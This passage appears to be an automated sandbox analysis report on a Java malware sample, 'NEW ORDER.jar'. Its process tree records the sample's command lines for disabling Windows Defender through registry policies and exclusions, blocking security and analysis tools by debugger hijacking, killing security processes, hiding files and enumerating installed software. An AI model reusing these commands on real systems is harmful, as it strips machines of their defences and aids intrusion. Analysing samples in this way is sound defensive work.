of 4204 3060 java.exe 348 PID 3060 wrote to memory of 4400 3060 java.exe 350 PID 3060 wrote to memory of 4400 3060 java.exe 350 PID 3060 wrote to memory of 4460 3060 java.exe 352 PID 3060 wrote to memory of 4460 3060 java.exe 352 PID 3060 wrote to memory of 4600 3060 java.exe 354 PID 3060 wrote to memory of 4600 3060 java.exe 354 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 2076 attrib.exe 2152 attrib.exe 2192 attrib.exe 1104 attrib.exe 1332 attrib.exe 1644 attrib.exe 1788 attrib.exe 1804 attrib.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2064
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1104
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1332
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1644
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1788
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:1804
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:2076
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\FVKwo2⤵
- Views/modifies file attributes
PID:2152
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s +r C:\Users\Admin\FVKwo\WbZqr.class2⤵
- Views/modifies file attributes
PID:2192
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:3832
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:2688
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\FVKwo','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\FVKwo\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2916
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2340
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:68
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3284
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3752
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3764
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1156
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1108
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1908
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2156
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1980
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2324
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:3056
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1304
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2684
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2540
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1224
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3928
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2548
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3812
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1652
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3904
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3780
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2820
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:643⤵PID:3808
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:323⤵PID:1060
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1428
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:2788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:3852
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:2192
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:732
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:416
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:564
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:2608
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1992
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2180
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:3808
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1908
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1496
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:2548
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:2088
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:2076
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:2604
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2092
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:3928
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:2072
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1292
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:732
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:2172
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:692
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:2824
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3668
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:1780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:2608
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1896
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:2172
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:3640
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:3732
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2160
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:3756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:632
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:500
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:424
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:3852
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2240
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:643⤵PID:3272
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:323⤵PID:3808
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2548
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:3904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:2184
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:896
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:2092
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:3668
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3748
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1104
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:3004
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:2824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:3024
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1304
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:2148
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:3976
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:643⤵PID:2164
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:323⤵PID:1424
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3808
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:3812
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:3768
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1160
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:504
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:408
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3668
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:3100
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1104
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:643⤵PID:2180
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:323⤵PID:2164
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:2824
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:488
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:643⤵PID:1880
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:323⤵PID:1292
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2076
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:643⤵PID:2672
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:323⤵PID:1512
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1660
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2824
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1880
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1292
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:564
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1564
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3976
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:572
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:2888
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:904
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1292
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:3812
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1424
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:3812
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:4104
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4124
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:4160
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:4220
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:4172
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4236
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:4292
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:4308
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4328
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:4364
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:4384
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4404
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:4440
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:4460
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4480
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:4516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:4536
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4556
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:4592
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:4612
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:643⤵PID:4668
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:323⤵PID:4688
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4708
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:643⤵PID:4744
-
-
